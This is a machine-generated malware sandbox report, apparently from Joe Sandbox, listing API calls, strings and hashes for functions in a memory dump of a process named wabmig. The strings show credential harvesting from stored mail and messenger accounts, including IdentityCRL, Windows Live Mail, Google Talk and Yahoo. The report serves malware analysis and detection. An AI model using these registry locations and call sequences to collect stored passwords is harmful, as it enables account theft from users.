                                                                              • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                              • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                              • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                              • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                            • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                            • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                            • API String ID: 2768085393-2409096184
                                                                            • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                            • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                            • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                            • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0044430B
                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                              • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                            • memset.MSVCRT ref: 00444379
                                                                            • memset.MSVCRT ref: 00444394
                                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                            • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                            • strlen.MSVCRT ref: 004443DB
                                                                            • _strcmpi.MSVCRT ref: 00444401
                                                                            Strings
                                                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                            • Store Root, xrefs: 004443A5
                                                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                            • API String ID: 832325562-2578778931
                                                                            • Opcode ID: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                            • Opcode Fuzzy Hash: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                            Control-flow Graph

                                                                            • Graph image not reproduced; recoverable summary: function 40f460-40f6df, basic blocks call memset (twice), 4078ba (twice), RegOpenKeyExA, RegQueryValueExA (twice), 40466b, 404734, 4047a5, memcpy, LocalFree, 404785, 4012ee and RegCloseKey (nodes marked Executed / Not Executed in the original rendering)
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040F567
                                                                            • memset.MSVCRT ref: 0040F57F
                                                                              • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                            • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                            • String ID:
                                                                            • API String ID: 2012582556-3916222277
                                                                            • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                            • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                            • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                            • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                            Control-flow Graph

                                                                            • Graph image not reproduced; recoverable summary: function 4037ca-4038e5, basic blocks call memset (twice), 444551, 4021b6, 406f06 (twice), strchr, _mbscpy (twice), strlen, sprintf and 4023e5 (nodes marked Executed / Not Executed in the original rendering)
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004037EB
                                                                            • memset.MSVCRT ref: 004037FF
                                                                              • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                              • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                            • strchr.MSVCRT ref: 0040386E
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                            • strlen.MSVCRT ref: 00403897
                                                                            • sprintf.MSVCRT ref: 004038B7
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                            • String ID: %s@yahoo.com
                                                                            • API String ID: 317221925-3288273942
                                                                            • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                            • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                            • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                            • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

Control-flow Graph (basic blocks; "->" lists successor blocks)
• 354: 404a99-404ac2 LoadLibraryA -> 355, 356
• 355: 404ac4-404ad2 GetProcAddress -> 357, 358
• 356: 404aec-404af4 -> 361
• 357: 404ad4-404ad8 -> 362
• 358: 404add-404ae6 FreeLibrary -> 356, 359
• 359: 404ae8-404aea -> 361
• 361: 404af5-404afa -> 363, 364
• 362: 404adb -> 358
• 363: 404b13-404b17
• 364: 404afc-404b12 MessageBoxA
APIs
• LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
• FreeLibrary.KERNEL32(00000000), ref: 00404ADE
• MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
• Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
• Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
• Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

Control-flow Graph (basic blocks; "->" lists successor blocks)
• 365: 4034e4-403544 memset * 2, call 410b1e -> 368, 369
• 368: 403580-403582
• 369: 403546-40357f _mbscpy, call 406d55, _mbscat, call 4033f0 -> 368
APIs
• memset.MSVCRT ref: 00403504
• memset.MSVCRT ref: 0040351A
  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
• _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
• _mbscat.MSVCRT ref: 0040356D
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: _mbscatmemset$Close_mbscpystrlen
• String ID: InstallPath$Software\Group Mail$fb.dat
• API String ID: 3071782539-966475738
• Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
• Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
• Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
• Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

Control-flow Graph (basic blocks; "->" lists successor blocks)
• 374: 40ccd7-40cd06 ??2@YAPAXI@Z -> 375, 376
• 375: 40cd08-40cd0d -> 377
• 376: 40cd0f -> 377
• 377: 40cd11-40cd24 ??2@YAPAXI@Z -> 378, 379
• 378: 40cd26-40cd2d call 404025 -> 381
• 379: 40cd2f -> 381
• 381: 40cd31-40cd57 -> 383, 384
• 383: 40cd66-40cdd9 call 407088, call 4019b5, memset, LoadIconA, call 4019b5, _mbscpy
• 384: 40cd59-40cd60 DeleteObject -> 383
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: ??2@$DeleteIconLoadObject_mbscpymemset
• String ID:
• API String ID: 2054149589-0
• Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
• Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
• Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
• Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

Control-flow Graph
APIs
  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
• memset.MSVCRT ref: 00408620
  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• memset.MSVCRT ref: 00408671
• RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
• RegCloseKey.ADVAPI32(?), ref: 004086D6
Strings
• Software\Google\Google Talk\Accounts, xrefs: 004085F1
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
• String ID: Software\Google\Google Talk\Accounts
• API String ID: 1366857005-1079885057
• Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
• Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
• Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
• Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

Control-flow Graph (basic blocks; "->" lists successor blocks)
• 414: 40ba28-40ba3a -> 415, 416
• 415: 40ba87-40ba9b call 406c62 -> 438, 439, 440, 441, 442
• 416: 40ba3c-40ba52 call 407e20, _mbsicmp -> 421, 422
• 421: 40ba54-40ba6d call 407e20 -> 427, 428
• 422: 40ba7b-40ba85 -> 415, 416
• 424: 40baa0-40bab3 call 407e30 -> 431, 432
• 427: 40ba74 -> 430
• 428: 40ba6f-40ba72 -> 430
• 430: 40ba75-40ba76 call 40b5e5 -> 422
• 431: 40bab5-40bac1 -> 434, 435
• 432: 40bafa-40bb09 SetCursor
• 434: 40bac3-40bace -> 435
• 435: 40bad8-40baf7 qsort -> 432
• 438: 40ba9d call 4107f1 -> 424
• 439: 40ba9d call 404734 -> 424
• 440: 40ba9d call 404785 -> 424
• 441: 40ba9d call 403c16 -> 424
• 442: 40ba9d call 410a9c -> 424
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: Cursor_mbsicmpqsort
• String ID: /nosort$/sort
• API String ID: 882979914-1578091866
• Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
• Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
• Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
• Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
APIs
  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
• memset.MSVCRT ref: 00410E10
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
• _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 889583718-2036018995
• Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
• Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
• Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
• Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
APIs
• FindResourceA.KERNEL32(?,?,?), ref: 00410C75
• SizeofResource.KERNEL32(?,00000000), ref: 00410C86
• LoadResource.KERNEL32(?,00000000), ref: 00410C96
• LockResource.KERNEL32(00000000), ref: 00410CA1
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
• Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
• Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
• Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
APIs
• memset.MSVCRT ref: 004109F7
  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
  • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
• WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
• memset.MSVCRT ref: 00410A32
• GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: PrivateProfileStringmemset$Writememcpysprintf
• String ID:
• API String ID: 3143880245-0
• Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
• Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
• Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
• Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
APIs
• ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00403F8E,0044C530), ref: 00408D5C
• ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D7A
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D98
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408DA8
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
• Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
• Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
• Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
APIs
• malloc.MSVCRT ref: 00406F4C
• memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
• free.MSVCRT ref: 00406F6D
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
• Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
• Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
• Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
• Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
APIs
  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
• CreateFontIndirectA.GDI32(?), ref: 004070A6
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: CreateFontIndirect_mbscpymemset
• String ID: Arial
• API String ID: 3853255127-493054409
• Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
• Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
• Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
• Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
• Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
APIs
  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
• _strcmpi.MSVCRT ref: 0040CEC3
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: strlen$_strcmpimemset
• String ID: /stext
• API String ID: 520177685-3817206916
• Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
• Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
• Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                            • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                            • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                            • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                            • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                            • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                            APIs
                                                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID:
                                                                            • API String ID: 145871493-0
                                                                            • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                            • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                            APIs
                                                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                            Memory Dump Source
